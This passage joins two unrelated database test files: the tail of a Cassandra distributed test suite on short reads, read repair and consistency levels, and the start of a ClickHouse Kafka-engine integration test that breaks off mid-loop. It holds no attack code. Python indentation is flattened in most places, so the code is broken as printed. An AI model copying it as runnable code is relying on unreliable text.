consistency_level=ConsistencyLevel.ALL)
session.execute(stmt)
# with node2 down and hints disabled, delete the partition on node1
node2.stop(wait_other_notice=True)
session.execute("DELETE FROM test.test WHERE id = 0;")
node2.start(wait_for_binary_proto=True)
# with both nodes up, do a CL.ALL query with per partition limit of 1;
# prior to CASSANDRA-13880 this would cause short read protection to loop forever
assert_none(session, "SELECT DISTINCT id FROM test.test WHERE id = 0;", cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13747(self):
"""
@jira_ticket CASSANDRA-13747
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);"
session.execute(query)
#
# populate the table with 10 rows:
#
# -7509452495886106294 | 5
# -4069959284402364209 | 1 x
# -3799847372828181882 | 8
# -3485513579396041028 | 0 x
# -3248873570005575792 | 2
# -2729420104000364805 | 4 x
# 1634052884888577606 | 7
# 2705480034054113608 | 6 x
# 3728482343045213994 | 9
# 9010454139840013625 | 3 x
stmt = session.prepare("INSERT INTO test.test (id) VALUES (?);")
for id in range(0, 10):
session.execute(stmt, [id], ConsistencyLevel.ALL)
# with node2 down and hints disabled, delete every other row on node1
node2.stop(wait_other_notice=True)
session.execute("DELETE FROM test.test WHERE id IN (1, 0, 4, 6, 3);")
# with both nodes up, do a DISTINCT range query with CL.ALL;
# prior to CASSANDRA-13747 this would cause an assertion in short read protection code
node2.start()
stmt = SimpleStatement("SELECT DISTINCT token(id), id FROM test.test;",
consistency_level=ConsistencyLevel.ALL)
result = list(session.execute(stmt))
assert_length_equal(result, 5)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_13595(self):
"""
@jira_ticket CASSANDRA-13595
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2)
node1, node2 = cluster.nodelist()
cluster.start()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = 'CREATE TABLE IF NOT EXISTS test.test (id int PRIMARY KEY);'
session.execute(query)
# populate the table with 10 partitions,
# then delete a bunch of them on different nodes
# until we get the following pattern:
# token | k | 1 | 2 |
# -7509452495886106294 | 5 | n | y |
# -4069959284402364209 | 1 | y | n |
# -3799847372828181882 | 8 | n | y |
# -3485513579396041028 | 0 | y | n |
# -3248873570005575792 | 2 | n | y |
# -2729420104000364805 | 4 | y | n |
# 1634052884888577606 | 7 | n | y |
# 2705480034054113608 | 6 | y | n |
# 3728482343045213994 | 9 | n | y |
# 9010454139840013625 | 3 | y | y |
stmt = session.prepare('INSERT INTO test.test (id) VALUES (?);')
for id in range(0, 10):
session.execute(stmt, [id], ConsistencyLevel.ALL)
# delete every other partition on node1 while node2 is down
node2.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE id IN (5, 8, 2, 7, 9);')
node2.start(wait_for_binary_proto=True)
session = self.patient_cql_connection(node2)
# delete the remaining partitions, except id 3, on node2 while node1 is down
node1.stop(wait_other_notice=True)
session.execute('DELETE FROM test.test WHERE id IN (1, 0, 4, 6);')
node1.start(wait_for_binary_proto=True)
session = self.patient_exclusive_cql_connection(node1)
# until #13595 the query would incorrectly return [1]
assert_all(session,
'SELECT id FROM test.test LIMIT 1;',
[[3]],
cl=ConsistencyLevel.ALL)
@since('3.0')
@ported_to_in_jvm('4.0')
def test_12872(self):
"""
@jira_ticket CASSANDRA-12872
"""
cluster = self.cluster
# disable hinted handoff and set batch commit log so this doesn't interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
query = "CREATE KEYSPACE IF NOT EXISTS test WITH replication = {'class': 'NetworkTopologyStrategy', 'datacenter1': 2};"
session.execute(query)
query = "CREATE TABLE test.test (pk int, ck int, PRIMARY KEY (pk, ck));"
session.execute(query)
stmt = session.prepare("INSERT INTO test.test (pk, ck) VALUES (0, ?);")
for ck in range(0, 4):
session.execute(stmt, [ck], ConsistencyLevel.ALL)
# node1 | up | 0 1 2 3
# node2 | up | 0 1 2 3
node2.stop(wait_other_notice=True)
# node1 | up | 0 1 2 3
# node2 | down | 0 1 2 3
session.execute('DELETE FROM test.test WHERE pk = 0 AND ck IN (1, 2, 3);')
# node1 | up | 0 x x x
# node2 | down | 0 1 2 3
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 5);')
# node1 | up | 0 x x x 5
# node2 | down | 0 1 2 3
node2.start()
node1.stop(wait_other_notice=True)
# node1 | down | 0 x x x 5
# node2 | up | 0 1 2 3
session = self.patient_cql_connection(node2)
session.execute('INSERT INTO test.test (pk, ck) VALUES (0, 4);')
# node1 | down | 0 x x x 5
# node2 | up | 0 1 2 3 4
node1.start()
# node1 | up | 0 x x x 5
# node2 | up | 0 1 2 3 4
assert_all(session,
'SELECT ck FROM test.test WHERE pk = 0 LIMIT 2;',
[[0], [4]],
cl=ConsistencyLevel.ALL)
@ported_to_in_jvm('4.0')
def test_short_read(self):
"""
@jira_ticket CASSANDRA-9460
"""
cluster = self.cluster
# This test causes the python driver to be extremely noisy due to
# frequent starting and stopping of nodes. Let's move the log level
# of the driver to ERROR for this test only
logging.getLogger("cassandra").setLevel('ERROR')
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0)
else:
create_cf(session, 'cf')
normal_key = 'normal'
reversed_key = 'reversed'
# insert 9 columns in two rows
insert_columns(self, session, normal_key, 9)
insert_columns(self, session, reversed_key, 9)
# Delete the first 3 columns (and the last 3, for the reversed version), with a different node down each time
for node, column_number_to_delete in zip(list(range(1, 4)), list(range(3))):
self.stop_node(node)
self.delete(node, normal_key, column_number_to_delete)
self.delete(node, reversed_key, 8 - column_number_to_delete)
self.restart_node(node)
# Query the first 3 columns in normal order
session = self.patient_cql_connection(node1, 'ks')
query = SimpleStatement(
'SELECT c, v FROM cf WHERE key=\'k{}\' LIMIT 3'.format(normal_key),
consistency_level=ConsistencyLevel.QUORUM)
rows = list(session.execute(query))
res = rows
assert_length_equal(res, 3)
# value 0, 1 and 2 have been deleted
for i in range(1, 4):
assert 'value{}'.format(i + 2) == res[i - 1][1]
# Query the first 3 columns in reverse order
session = self.patient_cql_connection(node1, 'ks')
query = SimpleStatement(
'SELECT c, v FROM cf WHERE key=\'k{}\' ORDER BY c DESC LIMIT 3'.format(reversed_key),
consistency_level=ConsistencyLevel.QUORUM)
rows = list(session.execute(query))
res = rows
assert_length_equal(res, 3)
# value 6, 7 and 8 have been deleted
for i in range(0, 3):
assert 'value{}'.format(5 - i) == res[i][1]
session.execute('TRUNCATE cf')
@ported_to_in_jvm('4.0')
def test_short_read_delete(self):
""" Test short reads ultimately leaving no columns alive [#4000] """
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0)
else:
create_cf(session, 'cf')
# insert 2 columns in one row
insert_columns(self, session, 0, 2)
# Delete the row while first node is dead
node1.flush()
node1.stop(wait_other_notice=True)
session = self.patient_cql_connection(node2, 'ks')
query = SimpleStatement('DELETE FROM cf WHERE key=\'k0\'', consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.start()
# Query first column
session = self.patient_cql_connection(node1, 'ks')
assert_none(session, "SELECT c, v FROM cf WHERE key=\'k0\' LIMIT 1", cl=ConsistencyLevel.QUORUM)
@ported_to_in_jvm('4.0')
def test_short_read_quorum_delete(self):
"""
@jira_ticket CASSANDRA-8933
"""
cluster = self.cluster
# Consider 3 nodes A, B, C (RF=3) and the following sequence of operations (all done at QUORUM):
# Disable hinted handoff and set batch commit log so this doesn't
# interfere with the test
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 3)
if cluster.version() < '4.0':
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v)) WITH read_repair_chance = 0.0")
else:
session.execute("CREATE TABLE t (id int, v int, PRIMARY KEY(id, v))")
# we write 1 and 2 in a partition: all nodes get it.
session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 1)", consistency_level=ConsistencyLevel.ALL))
session.execute(SimpleStatement("INSERT INTO t (id, v) VALUES (0, 2)", consistency_level=ConsistencyLevel.ALL))
# we delete 1: only A and C get it.
node2.flush()
node2.stop(wait_other_notice=True)
session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 1", consistency_level=ConsistencyLevel.QUORUM))
node2.start()
# we delete 2: only B and C get it.
node1.flush()
node1.stop(wait_other_notice=True)
session = self.patient_cql_connection(node2, 'ks')
session.execute(SimpleStatement("DELETE FROM t WHERE id = 0 AND v = 2", consistency_level=ConsistencyLevel.QUORUM))
node1.start()
session = self.patient_cql_connection(node1, 'ks')
# we read the first row in the partition (so with a LIMIT 1) and A and B answer first.
node3.flush()
node3.stop(wait_other_notice=True)
assert_none(session, "SELECT * FROM t WHERE id = 0 LIMIT 1", cl=ConsistencyLevel.QUORUM)
@ported_to_in_jvm('4.0')
def test_readrepair(self):
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.populate(2).start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
if cluster.version() < '4.0':
create_c1c2_table(self, session, read_repair=1.0)
else:
create_c1c2_table(self, session)
node2.stop(wait_other_notice=True)
insert_c1c2(session, n=10000, consistency=ConsistencyLevel.ONE)
node2.start(wait_for_binary_proto=True)
# query everything to cause RR
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.QUORUM)
node1.stop(wait_other_notice=True)
# Check node2 for all the keys that should have been repaired
session = self.patient_cql_connection(node2, keyspace='ks')
for n in range(0, 10000):
query_c1c2(session, n, ConsistencyLevel.ONE)
def test_quorum_available_during_failure(self):
cl = ConsistencyLevel.QUORUM
rf = 3
logger.debug("Creating a ring")
cluster = self.cluster
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
logger.debug("Set to talk to node 2")
session = self.patient_cql_connection(node2)
create_ks(session, 'ks', rf)
create_c1c2_table(self, session)
logger.debug("Generating some data")
insert_c1c2(session, n=100, consistency=cl)
logger.debug("Taking down node1")
node1.stop(wait_other_notice=True)
logger.debug("Reading back data.")
for n in range(100):
query_c1c2(session, n, cl)
def stop_node(self, node_number):
to_stop = self.cluster.nodes["node%d" % node_number]
to_stop.flush()
to_stop.stop(wait_other_notice=True)
def delete(self, stopped_node_number, key, column):
next_node = self.cluster.nodes["node%d" % (((stopped_node_number + 1) % 3) + 1)]
session = self.patient_cql_connection(next_node, 'ks')
# delete data for normal key
query = 'BEGIN BATCH '
query = query + 'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c%06d\'; ' % (key, column)
query = query + 'DELETE FROM cf WHERE key=\'k%s\' AND c=\'c2\'; ' % (key,)
query = query + 'APPLY BATCH;'
simple_query = SimpleStatement(query, consistency_level=ConsistencyLevel.QUORUM)
session.execute(simple_query)
def restart_node(self, node_number):
stopped_node = self.cluster.nodes["node%d" % node_number]
stopped_node.start(wait_for_binary_proto=True)
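# All of the tests above repeat the same two-node bootstrap (hinted handoff
# off, batch commitlog, RF=2 keyspace, simple table). A minimal consolidation
# sketch; the helper name `_bootstrap_two_node_cluster` is hypothetical and
# not part of the dtest framework:
def _bootstrap_two_node_cluster(self):
    cluster = self.cluster
    # hints and commitlog batching are configured the same way in every test,
    # so that repairs come only from read repair / short read protection
    cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
    cluster.set_batch_commitlog(enabled=True)
    cluster.populate(2).start()
    node1, node2 = cluster.nodelist()
    session = self.patient_cql_connection(node1)
    session.execute("CREATE KEYSPACE IF NOT EXISTS test WITH replication = "
                    "{'class': 'NetworkTopologyStrategy', 'datacenter1': 2};")
    session.execute('CREATE TABLE IF NOT EXISTS test.test (pk int, ck int, PRIMARY KEY (pk, ck));')
    return node1, node2, session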
|
test.py | import os.path as p
import random
import threading
import time
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
from helpers.network import PartitionManager
import json
import subprocess
import kafka.errors
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.admin import NewTopic
from kafka.protocol.admin import DescribeGroupsResponse_v1, DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
import socket
from google.protobuf.internal.encoder import _VarintBytes
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
import kafka_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
config_dir='configs',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml' ],
with_kafka=True,
with_zookeeper=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
# print ("Produced {} messages for topic {}".format(len(messages), topic))
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic,))
for toppar, messages in consumer.poll(5000).items():
if toppar.topic == topic:
for message in messages:
yield message.value
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = b''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic=topic, value=data)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
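# The tests below accumulate `SELECT * FROM test.kafka` output in a bare
# `while True` loop until kafka_check_result() passes, which can spin forever
# on failure. A bounded variant of the same pattern; this helper is a sketch
# with a hypothetical name and is not used by the tests:
def kafka_check_result_with_retries(fetch_fn, max_retries=60, delay=1):
    result = ''
    for _ in range(max_retries):
        # accumulate chunks exactly like the in-test loops do
        result += fetch_fn()
        if kafka_check_result(result):
            return result
        time.sleep(delay)
    raise AssertionError("result did not match the reference after {} retries".format(max_retries))
# Example usage (hypothetical):
# kafka_check_result_with_retries(lambda: instance.query('SELECT * FROM test.kafka', ignore_error=True))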
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(name):
client = BrokerConnection('localhost', 9092, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic':topic, 'partitions':partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print("kafka_id is {}".format(kafka_id))
instance.query('CREATE DATABASE test')
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP TABLE IF EXISTS test.kafka')
wait_kafka_is_available()
print("kafka is available - running test")
yield # run test
instance.query('DROP TABLE IF EXISTS test.kafka')
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('kafka1:19092', 'old', 'old', 'JSONEachRow', '\\n');
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == u'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'new',
kafka_group_name = 'new',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_client_id = '{instance} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == u'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }', '{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
time.sleep(9)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter now works, as part of all available format settings.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer','100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
time.sleep(10)
instance.query('SELECT * FROM test.view')
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
time.sleep(0.5)
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
#kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# the original problem showed up as the following sequence of messages in the librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. librdkafka waited forever for the application to execute the queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# the first consumer subscribes to the topic, tries to poll some data, and goes idle
instance.query('SELECT * FROM test.kafka')
# the second consumer does the same, triggering a rebalance in the first
# consumer, and tries to poll some data
instance.query('SELECT * FROM test.kafka2')
#echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# the first consumer has a pending, unprocessed rebalance callback (no poll happens after the select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_select_empty(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
